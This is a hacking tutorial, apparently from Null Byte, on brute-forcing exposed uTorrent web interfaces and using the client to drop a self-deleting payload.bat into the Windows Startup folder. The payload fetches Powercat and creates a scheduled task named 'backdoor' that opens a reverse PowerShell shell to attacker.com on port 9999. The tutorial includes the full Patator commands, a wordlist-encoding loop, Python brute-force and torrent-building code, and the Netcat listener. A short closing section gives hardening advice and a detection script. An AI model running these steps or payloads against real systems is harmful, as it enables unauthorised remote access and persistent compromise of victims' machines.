
How to hack uTorrent clients and backdoor the operating system « Null Byte :: WonderHowTo



Compromised uTorrent clients can be abused to download a malicious torrent file. The malicious file is designed to plant and execute a persistent back door the next time Windows 10 restarts, giving the attacker remote access to the operating system at will. There are, however, a few ways to avoid becoming a target.

Torrent clients such as uTorrent and Transmission have built-in features that let server administrators reach the client remotely through a web application interface, as shown in the uTorrent web app example below.

The number of publicly reachable torrent clients keeps growing, and as the clients grow in popularity so does the number of poorly configured and insecure instances. Like any web app, these clients can be attacked in several ways: in recent years numerous directory traversal, privilege escalation and cross-site scripting vulnerabilities have been disclosed, as shown in the image below, and attackers may yet find ways to bypass authentication entirely.

Understanding the attack

So a torrent client gets hacked. What is the worst an attacker can do, pirate some copyrighted material? It gets worse. Torrent clients can create files and folders on the system and overwrite existing files, and that file system access can be abused by downloading malicious files through the compromised client.

For example, an attacker could download an executable or script into the Startup folder of a Windows 10 computer, as shown in the GIF below. Windows runs every file in that folder without user interaction each time the user logs on, which is what happens after the server or computer is restarted and the user signs back in.

Change the default download folder in a hacked uTorrent client.

Linux systems are just as exposed to this kind of attack, but they are beyond the scope of the demonstration here. The .bashrc file found on most Linux systems is essentially a Bash script that runs every time a new interactive shell is opened, including, on most distributions, after an SSH login. An attacker could use the compromised torrent client to download a malicious .bashrc that replaces the original on the server, so that the attacker's .bashrc runs whenever someone logs on to the server.

This article shows how uTorrent web apps can be brute-forced and then used to download a PowerShell script into the Windows 10 Startup folder. The PowerShell script is designed to plant a persistent back door and remove itself as soon as it has finished.

Step 1: Brute Force the Login with Patator

Research suggests that most passwords are six to eight characters long. Weak passwords let an attacker guess the uTorrent login and manipulate files on the server.

Patator is a brute-forcing tool in the same family as Hydra, Medusa and Burp's Intruder module. Using Patator to brute-force web app logins is very similar to brute-forcing router gateways; my previous article, "Break into Router Gateways with Patator", describes the command line and examples in detail.

1. Install Patator

To start, install Patator with the following command if it is not already installed. On full Kali Linux installs, Patator may already be on the system.

  ~# apt-get update && apt-get install patator

  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following NEW packages will be installed:
    ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
    libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
    python3-paramiko python3-psycopg2 unzip
  0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
  Need to get 43.9 MB of archives.
  After this operation, 192 MB of additional disk space will be used.
  Do you want to continue? [Y/n] Y

2. Record a login request with Burp's proxy

Open Firefox and Burp Suite. Configure Firefox to proxy requests through Burp and record the login request. uTorrent's web UI uses HTTP Basic authentication, so the request carries an "Authorization: Basic" header followed by the base64-encoded "username:password". Replace that base64 string with "FILE0", right-click the request and choose "Copy to file". The FILE0 string is the placeholder Patator fills in from the wordlist. Save the request in the /tmp folder as "utorrent_request.txt".

3. Generate a targeted word list

Hashes.org has published wordlists of cracked passwords recovered over the last two years. The 2018 wordlist, highlighted in the image below, can be downloaded from the website; that is the one used as an example in this guide.

Unpack the archive with the 7z x archive.7z command, where "archive" is the path and file name of the compressed file you downloaded. For example:

  ~# 7z x /root/Downloads/hashes.org-2018.7z

  7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
  p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)

  Scanning the drive for archives:
  1 file, 1424620615 bytes (1359 MiB)

  Extracting archive: /root/Downloads/hashes.org-2018.7z
  --
  Path = /root/Downloads/hashes.org-2018.7z
  Type = 7z
  Physical Size = 1424620615
  Headers Size = 142
  Method = LZMA:24
  Solid = -
  Blocks = 1

  Everything is Ok

  Size:       6429547050
  Compressed: 1424620615

Then base64-encode each line of the wordlist as "admin:<password>", which is exactly what the browser puts after "Authorization: Basic". The username "admin" is the default for uTorrent web apps. Replace "./hashes.org-2018.txt" with the path and name of the wordlist you downloaded.

  ~# while read -r password; do printf '%s' "admin:$password" | base64; done < ./hashes.org-2018.txt >> ./base64_wordlist.txt

4. Brute Force with Patator

In my tests against uTorrent version 3.5.5 on Windows 10, hundreds of thousands of failed login attempts triggered no blacklisting or rate limiting. uTorrent appears to allow an unlimited number of login attempts over an extended period.

Use the patator command below with the utorrent_request.txt file created in an earlier step to brute-force uTorrent web logins. Make sure you replace the paths below with the correct ones, since yours may differ.

  ~# patator http_fuzz raw_request=/tmp/utorrent_request.txt accept_cookie=1 follow=1 0=./base64_wordlist.txt

16:31:45 patator INFO - Patator v0.7 (https://github.com/lanjelot/patator) starting on 2020-01-29 16:31 EST 

To break that command down:

  • raw_request= – use the utorrent_request.txt created in an earlier step as the template for login attempts against the web app.
  • accept_cookie= – keep any cookies the server sets and send them with later requests.
  • follow= – follow Location redirects, for both failed and successful login attempts, when the server issues them.
  • 0= – the "FILE0" placeholder in utorrent_request.txt is replaced, one line at a time, with entries from the supplied password list.

After executing the command, my output looks like this:

  code size:clen       time | candidate                          |   num | mesg
  -----------------------------------------------------------------------------
  401  159:0          0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ==   |  9902 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWFydGluYTk1           |  9912 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWVpbnMhISE=           |  9922 | HTTP/1.1 401 Unauthorized
  401  159:0          0.007 | YWRtaW46ISEhbWljaCEhIQ==           |  9932 | HTTP/1.1 401 Unauthorized
  401  159:0          0.001 | YWRtaW46ISEhbW9t                   |  9942 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmFpY3VMISEh           |  9952 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmV3d2F2ZQ==           |  9962 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbm93YXk=               |  9972 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhb29vNTIx               |  9982 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhcGluayEhIQ==           |  9992 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWFyeTEyMw==           |  9913 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWVsbDI3ODE=           |  9923 | HTTP/1.1 401 Unauthorized
  401  159:0          0.001 | YWRtaW46ISEhbWljaGVsbGU=           |  9933 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbW9uZXk=               |  9943 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmFtYXN0ZTIy           |  9953 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmlhaXdvYnU=           |  9963 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbndseTAy               |  9973 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhb3N0YXAhISE=           |  9983 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhcGlwa2EyMDA0ISEh       |  9993 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWFzY3VsaW5vISEh       |  9915 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWVuZzEyMw==           |  9925 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbWluaW9uNTg=           |  9935 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbXVja2VsMDgxNQ==       |  9945 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmFuZGExOTk1           |  9955 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbmlja2k=               |  9965 | HTTP/1.1 401 Unauthorized
  401  159:0          0.000 | YWRtaW46ISEhbzc3M2g=               |  9975 | HTTP/1.1 401 Unauthorized
  200  42340:42176    0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA==       |  9985 | HTTP/1.1 200 OK
  401  159:0          0.004 | YWRtaW46ISEhcG9wOTI=               |  9995 | HTTP/1.1 401 Unauthorized
  Hits/Done/Skip/Fail/Size: 10000/10000/0/0/10000, Avg: 1607 r/s, Time: 0h 0m 6s

Failed attempts (401) can be filtered out; the one 200 response is the hit. The successful candidate can be decoded with base64. For example:

  ~# base64 -d <<< 'YWRtaW46UGFTU3dvUkRAMTIzNA=='

  admin:PaSSwoRD@1234
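The whole of Step 1, from encoding "admin:<password>" candidates to spotting the single non-401 response and decoding it, as an added Python example (it is not code from the original post, nor from Patator). It runs against a local mock of the uTorrent web UI that is constructed here: the credential the mock accepts is the one recovered above, the six-entry wordlist stands in for hashes.org-2018.txt, the /gui/ path and the use of an ephemeral loopback port are assumptions, and, like the real client in the tests described above, the mock never locks out or throttles a source.

```python
"""Brute-force an HTTP Basic-auth login the way the Patator step does,
against a throw-away local mock of the uTorrent web UI.

Added example for this article. The mock server, the wordlist, the /gui/
path and the loopback port are all constructed here; nothing is captured
from a real uTorrent instance."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed: the mock accepts the credential recovered in the article.
MOCK_USER = "admin"
MOCK_PASSWORD = "PaSSwoRD@1234"

# Constructed wordlist standing in for hashes.org-2018.txt.
WORDLIST = ["123456", "!!!mafeifei12345", "!!!martina95", "!!!mom",
            "PaSSwoRD@1234", "!!!pop92"]


class MockWebUI(BaseHTTPRequestHandler):
    """Minimal stand-in for the uTorrent web UI: Basic auth only, no lockout,
    no rate limit. Every failed attempt is answered with 401, forever."""
    attempts = 0

    def do_GET(self):
        type(self).attempts += 1
        expected = "Basic " + base64.b64encode(
            f"{MOCK_USER}:{MOCK_PASSWORD}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<html>uTorrent Web UI</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="uTorrent"')
            self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock():
    """Bind an ephemeral loopback port and serve from a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), MockWebUI)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def encode_candidates(user, passwords):
    """Step 3 in Python: yield (plaintext, base64 token) pairs."""
    for pw in passwords:
        plain = f"{user}:{pw}"
        yield plain, base64.b64encode(plain.encode()).decode()


def brute_force(host, port, user, passwords, path="/gui/"):
    """Step 4: send each token as 'Authorization: Basic <token>' and stop
    at the first response that is not 401.
    Returns (status, plaintext, token, attempts_made)."""
    tries = 0
    for plain, token in encode_candidates(user, passwords):
        tries += 1
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        status = conn.getresponse().status
        conn.close()
        if status != 401:
            return status, plain, token, tries
    return None, None, None, tries


def decode_hit(token):
    """The `base64 -d` step: recover username:password from the token."""
    return base64.b64decode(token).decode()


def run_demo():
    """Start the mock, run the attack against it, tear the mock down."""
    srv = start_mock()
    try:
        return brute_force("127.0.0.1", srv.server_port, MOCK_USER, WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    status, plain, token, tries = run_demo()
    print(f"{status} after {tries} attempts: {token} -> {decode_hit(token)}")
```

The classification rule is the same one Patator's output table relies on: anything other than a 401 is worth a look, and the one 200 among thousands of 401s is the hit. Because the mock (like the real client in the tests above) never throttles, the attempt counter only ever grows; a hardened front end would have closed the door long before the fifth try.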

Step 2: Change the default download folder

After gaining access to the torrent client, if there are no active downloads, simply add any torrent and open its "General" tab: the save path shown there reveals the username on the Windows system. The torrent can be removed once the username is known.

Open "Preferences" and click the "Directories" tab. Tick the "Put new downloads in" box and enter the Startup folder path:

  C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Make sure you replace <username> with the Windows 10 username discovered above.

Step 3: Create the Payload.bat

The PowerShell script (payload.bat) will plant a persistent back door with the schtasks command and then remove the evidence of itself from the Startup folder.

This is just one example of a PowerShell payload. Such a script can perform a wide range of automated attacks, such as exfiltrating sensitive files, live-streaming the desktop, dumping passwords or turning the device into a web proxy.

The PowerShell payload below consists of several lines. Comments have been added to explain what each line does.

  # A new folder named "Windows" is created in the user's profile in an
  # attempt to hide the malicious script behind a legitimate-looking name.
  mkdir "C:\Users\$env:username\Windows"

  # Invoke-WebRequest (iwr) downloads Powercat, a Netcat-like PowerShell
  # module; -O is accepted as an abbreviation of -OutFile. The script is
  # saved in the new "Windows" folder.
  iwr 'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' -O C:\Users\$env:username\Windows\powercat.ps1

  # schtasks creates a scheduled task named "backdoor". The task imports the
  # Powercat module (ipmo) and tries to open a TCP connection to the attacker's
  # system on port 9999, with a PowerShell shell attached (-e powershell),
  # every time the Windows 10 computer has been idle for one minute
  # (/sc onidle /i 1).
  schtasks /create /f /tn backdoor /tr 'powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\powercat.ps1;powercat -c attacker.com -p 9999 -e powershell' /sc onidle /i 1

  # Finally payload.bat deletes itself from the Startup folder.
  rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\payload.bat

Create a folder named "torrent" with the mkdir command.

  ~# mkdir torrent/

Change into the new folder.

  ~# cd torrent/
  ~/torrent#

The payload above is condensed into a single line, with the individual commands chained by semicolons, so that Windows 10 executes all of it as one command.

Use nano to create a new "payload.bat" file:

  ~/torrent# nano payload.bat

And save the PowerShell one-liner below in the file:

  powershell -ep bypass /w 1 "& mkdir C:\Users\$env:username\Windows; iwr 'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' -O C:\Users\$env:username\Windows\powercat.ps1; schtasks /create /f /tn backdoor /tr 'powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\powercat.ps1;powercat -c attacker.com -p 9999 -e powershell' /sc onidle /i 1; rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\payload.bat"

Note the backtick (`) in the "Start` Menu" path. This is not a typo: the backtick is PowerShell's escape character, and here it escapes the space so the path is parsed as a single argument.

Step 4: Create the Torrent file

In a new terminal window in Kali, install the qBittorrent client. Most torrent applications can create torrents, but the Transmission GTK client could not create the .torrent file in my tests, so it is not recommended.

  ~# apt-get update && apt-get install qbittorrent

  Hit:1 https://mirrors.ocf.berkeley.edu/kali kali-rolling InRelease
  Reading package lists... Done
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following NEW packages will be installed:
    libboost-random1.67.0 libtorrent-rasterbar9 qbittorrent
  0 upgraded, 3 newly installed, 0 to remove and 185 not upgraded.
  Need to get 7,051 kB of archives.
  After this operation, 15.2 MB of additional disk space will be used.
  Do you want to continue? [Y/n]

Open qBittorrent. Click "Tools" in the menu bar and then "Torrent Creator" to open the Torrent Creator window.

Set the path to the payload.bat file, tick the "Start seeding immediately" box, add tracker URLs and click the "Create Torrent" button.
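What the Torrent Creator actually writes is a small bencoded dictionary: an announce URL plus an "info" dictionary holding the file name, its length, the piece length and the SHA-1 hash of every piece. The Python below builds that file for payload.bat by hand and recovers the info hash (the value peers and trackers key on). It is an added example for this article, not code from qBittorrent, uTorrent or the original post; the payload bytes, the tracker URL and the 16 KiB piece length are constructed and hypothetical.

```python
"""Build a single-file .torrent for payload.bat by hand: bencoding plus
SHA-1 piece hashes, the same structure a GUI torrent creator writes.

Added example for this article. PAYLOAD, TRACKER and PIECE_LENGTH are
constructed stand-ins, not values from the original post."""
import hashlib

# Constructed stand-in for the contents of payload.bat; any bytes work.
PAYLOAD = b'powershell -ep bypass /w 1 "& mkdir C:\\Users\\$env:username\\Windows"\r\n'
TRACKER = "udp://tracker.example.invalid:6969/announce"  # hypothetical tracker
PIECE_LENGTH = 16384  # 16 KiB pieces; the tiny payload fits in one piece


def bencode(value):
    """Encode int / bytes / str / list / dict in BitTorrent's bencode format.
    Dict keys are emitted in sorted byte order, which is what makes the
    encoding canonical and the info hash reproducible."""
    if isinstance(value, bool):
        raise TypeError("bencode has no boolean type")
    if isinstance(value, int):
        return b"i%de" % value
    if isinstance(value, str):
        value = value.encode("utf-8")
    if isinstance(value, bytes):
        return b"%d:%s" % (len(value), value)
    if isinstance(value, list):
        return b"l" + b"".join(bencode(v) for v in value) + b"e"
    if isinstance(value, dict):
        items = sorted((k.encode() if isinstance(k, str) else k, v)
                       for k, v in value.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError(f"cannot bencode {type(value).__name__}")


def bdecode(data):
    """Decode one bencoded value. Returns (value, bytes_consumed); strings
    come back as bytes and dict keys as bytes, exactly as stored."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":
            out, i = [], i + 1
            while data[i:i + 1] != b"e":
                v, i = parse(i)
                out.append(v)
            return out, i + 1
        if c == b"d":
            out, i = {}, i + 1
            while data[i:i + 1] != b"e":
                k, i = parse(i)
                v, i = parse(i)
                out[k] = v
            return out, i + 1
        colon = data.index(b":", i)
        n = int(data[i:colon])
        return data[colon + 1:colon + 1 + n], colon + 1 + n
    return parse(0)


def piece_hashes(content, piece_length):
    """Concatenated 20-byte SHA-1 digests, one per piece, in order."""
    return b"".join(hashlib.sha1(content[i:i + piece_length]).digest()
                    for i in range(0, len(content), piece_length))


def make_torrent(name, content, tracker, piece_length=PIECE_LENGTH):
    """Return the bencoded .torrent bytes for a single file."""
    info = {
        "name": name,
        "length": len(content),
        "piece length": piece_length,
        "pieces": piece_hashes(content, piece_length),
    }
    return bencode({"announce": tracker, "info": info})


def info_hash(torrent_bytes):
    """SHA-1 over the re-encoded 'info' dict: the torrent's identity on the
    swarm. The announce URL is deliberately not part of it."""
    meta, _ = bdecode(torrent_bytes)
    return hashlib.sha1(bencode(meta[b"info"])).hexdigest()


if __name__ == "__main__":
    t = make_torrent("payload.bat", PAYLOAD, TRACKER)
    with open("payload.bat.torrent", "wb") as f:
        f.write(t)
    print("info hash:", info_hash(t))
```

Two things worth noticing: the file name inside "info" is what the receiving client writes to disk, so the "payload.bat" name that lands in the Startup folder is chosen by whoever made the torrent, not by the victim; and because the piece hashes are part of "info", the downloaded bytes are verified against the attacker's hashes, so the payload arrives exactly as seeded.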

Step 5: Import the Torrent file

In the hacked uTorrent client, click the "Add Torrent" button in the upper-left corner and import the payload.bat.torrent created in the previous step.

payload.bat contains only a short PowerShell one-liner, so it should download within a few seconds. On the Windows 10 machine, which the attacker cannot yet access directly, payload.bat now sits in the Startup folder.

Payload.bat downloaded via the uTorrent client and stored in the boot folder.

The next time Windows 10 restarts and the user logs on, payload.bat runs. With virtual private servers it can be difficult to get the target to restart; several ideas for achieving that are described later in the article.

Step 6: Start the Netcat Listener

In Kali, the following Netcat command opens a listener (-l) on port (-p) 9999. The listener catches the connection made by the Powercat command embedded in the Windows 10 scheduled task. The port number can be changed, but it must match the Powercat port used in payload.bat.

  ~# nc -v -l -p 9999

  listening on [any] 9999 ...

Step 7: restart the server

Windows 10 laptops on a local network can be provoked into restarting fairly easily. With virtual private servers it can take days, weeks or even months before the target server is restarted; system administrators rarely reboot a remote system for no reason.

Below are several methods that can cause a user or administrator to restart the operating system.

Step 8: Post-Exploitation

If the attack succeeded, the .bat payload will have removed itself from the Startup folder, and a new TCP connection to the attacker's system is made every time the Windows computer has sat idle for one minute.

  ~# nc -v -l -p 9999

  listening on [any] 9999 ...
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.

  PS C:\Windows\system32>

Preventing this type of attack

As an avid user of torrent applications, I find remote access to the client makes downloading new content very convenient. But these web apps must be properly hardened, for example by placing them behind an Nginx reverse proxy, reaching them only over SSH port forwarding, or exposing them solely as a Tor onion service, so that they are not open to unrestricted brute-force attacks and full client access from the internet. Since uTorrent itself applied no lockout or rate limiting in the tests above, a long, unique password is the only thing standing between a directly exposed client and the attack described here.
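Steps 3 and 8 leave two artifacts a defender can look for: a scheduled task whose action launches PowerShell with a bypassed execution policy on an idle trigger, and a script dropped into a user's Startup folder (it deletes itself, but only after it has run, so it is visible until the next logon). The Python below, an added example for this article and not part of the original post, triages saved `schtasks /query /fo CSV /v` output and a Startup folder listing offline. The CSV is a constructed sample carrying a subset of the columns that command emits, the listing is constructed too, and the host name, user name and task names in them are made up.

```python
"""Triage for the persistence planted in Step 3: scheduled tasks that run
PowerShell with a bypassed execution policy, a hidden window, a module from
a user profile path or an idle trigger, plus script files in Startup.

Added example for this article. The CSV and listing below are constructed
samples (subset of `schtasks /query /fo CSV /v` columns), not captures."""
import csv
import io
import ntpath
import re

SAMPLE_SCHTASKS_CSV = '''"HostName","TaskName","Status","Author","Task To Run","Schedule Type","Idle Time","Run As User"
"WIN10","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\\system32\\defrag.exe -c -h -o -$","Weekly","Disabled","SYSTEM"
"WIN10","\\OneDrive Standalone Update Task-S-1-5-21-1","Ready","Microsoft","%localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","Daily","Disabled","user"
"WIN10","\\backdoor","Ready","WIN10\\user","powershell /w 1 -ep bypass /C ipmo C:\\Users\\user\\Windows\\powercat.ps1;powercat -c attacker.com -p 9999 -e powershell","On idle","0:01:00","user"
'''

# Constructed listing of a user's Startup folder; desktop.ini and .lnk are normal.
SAMPLE_STARTUP_LISTING = ["desktop.ini", "Send to OneNote.lnk", "payload.bat"]

SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}

# Each rule: (reason, regex applied to the "Task To Run" column).
TASK_RULES = [
    ("launches powershell", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("execution policy bypass",
     re.compile(r"[-/](ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("hidden window", re.compile(r"[-/](w|windowstyle)\s+(1|hidden)\b", re.I)),
    ("imports a module from a user profile path",
     re.compile(r"\b(ipmo|import-module)\b[^;]*\\users\\", re.I)),
    ("spawns a shell over the network",
     re.compile(r"\bpowercat\b|\s-e\s+(powershell|cmd)\b", re.I)),
]


def triage_tasks(csv_text):
    """Return the suspicious tasks with the reasons that fired.
    A task that merely runs PowerShell is common, so a second indicator
    (or an idle trigger on top of one) is required before it is reported."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "")
        reasons = [reason for reason, rx in TASK_RULES if rx.search(action)]
        if reasons and row.get("Schedule Type", "").strip().lower() == "on idle":
            reasons.append("on-idle trigger")
        if len(reasons) >= 2:
            findings.append({
                "task": row.get("TaskName", ""),
                "user": row.get("Run As User", ""),
                "action": action,
                "reasons": reasons,
            })
    return findings


def triage_startup(listing):
    """Return entries in a Startup folder that are scripts rather than
    the shortcuts and desktop.ini normally found there."""
    return [name for name in listing
            if ntpath.splitext(name)[1].lower() in SCRIPT_EXTENSIONS]


if __name__ == "__main__":
    for hit in triage_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{hit['task']} (runs as {hit['user']}): {', '.join(hit['reasons'])}")
    for name in triage_startup(SAMPLE_STARTUP_LISTING):
        print(f"script in Startup: {name}")
```

On a live host the CSV comes from `schtasks /query /fo CSV /v > tasks.csv` and the listing from `dir` on each user's Startup folder; the rules are deliberately generic (any `-ep bypass`, any hidden-window PowerShell on an idle trigger), so they also catch variants of this payload that rename the task or swap Powercat for another tool.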

Until the next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or send me a message if you have any questions.


Cover photo and screenshots of tokyoneon / Null Byte



